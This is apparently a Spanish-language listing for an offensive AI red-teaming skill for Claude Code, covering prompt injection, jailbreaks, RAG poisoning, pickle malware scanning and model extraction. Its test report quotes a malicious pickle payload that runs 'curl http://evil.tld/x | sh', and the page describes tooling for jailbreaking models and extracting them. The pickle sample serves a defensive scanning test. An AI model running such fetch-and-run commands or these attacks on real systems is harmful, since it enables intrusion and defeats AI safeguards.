AI Security
Pruebas ofensivas de sistemas LLM/ML: inyección de prompt, envenenamiento RAG, escaneo de modelos pickle
Probado · Funciona
Qué hace
Una habilidad de seguridad ofensiva para red-teaming de sistemas AI/ML: baterías de inyección de prompt y jailbreak multi-turno, envenenamiento de RAG/vector-DB, auditorías de envenenamiento de herramientas MCP/agente, escaneo de malware de modelos pickle pre-carga y extracción de modelos de caja negra/sondas de inferencia de membresía, con mapeos OWASP LLM Top-10 y MITRE ATLAS. Se activa cuando un usuario pide atacar, hacer red-team o auditar un LLM, chatbot, pipeline RAG, servidor MCP o un artefacto de modelo descargado. Incluye cinco scripts Python ejecutables más cinco análisis profundos de referencia vinculados a CVEs específicos de 2024-2025.
Informe de la prueba
skills/ai-security/SKILL.md obtenido y 3 archivos empaquetados verificados (promptinject_harness.py, rag_poisoner.py, prompt-injection-jailbreak.md) — todos HTTP 200. Para OUTPUT ejecuté scripts/model_scan.py de la habilidad (solo stdlib) contra pickles que creé: uno malicioso con __reduce__ -> os.system("curl http://evil.tld/x | sh"), uno benigno y uno benigno cuyos datos solo contenían las cadenas "operating_system"/"subprocess". La línea base (byte-grep ingenuo) marcó el archivo malicioso pero también dio FALSO-POSITIVO al archivo de lista de etiquetas benigno. La habilidad desensambló los opcodes de pickle a través de pickletools, resolvió posix.system a través de REDUCE-reachability como un callable denegado (JSONL estructurado: severity high, CWE-502, AML.T0011, exit code 2 como puerta CI) y limpió correctamente ambos archivos benignos. Instalación verificada en un HOME mktemp limpio que coloca SKILL.md en ~/.claude/skills/ai-security/SKILL.md.
Probado el: 2026-07-31 · Claude Code 2.x (agent harness)
Instalación
git clone --depth 1 https://github.com/hypnguyen1209/offensive-claude.git /tmp/ai-security-src mkdir -p ~/.claude/skills cp -R /tmp/ai-security-src/skills/ai-security ~/.claude/skills/ai-security # Verifies at ~/.claude/skills/ai-security/SKILL.md (bundles references/ + scripts/). # Script deps vary: model_scan.py is stdlib-only; rag_poisoner.py needs sentence-transformers; # promptinject_harness.py + model_extractor.py need `pip install requests` and a live target endpoint. # Repo-level plugin alternative (registers a SessionStart dispatcher hook — not needed for this skill alone): # /plugin marketplace add hypnguyen1209/offensive-claude # /plugin install offensive-claude@offensive-claude-marketplace # NOTE: the README also offers `curl -sL .../install.sh | bash` — a curl|sh pipe; the manual cp above avoids it.
Comandos y prompts de ejemplo
/ai-securityPruebas ofensivas de sistemas LLM/ML: inyección de prompt, envenenamiento RAG, escaneo de modelos pickle
Los skills se activan con peticiones en lenguaje natural, sin comandos que memorizar. Tras instalarlo, prompts como estos lo activan (en inglés):
Test this model against known jailbreak techniquesCheck this RAG pipeline for vector poisoningRun a model extraction attack against this API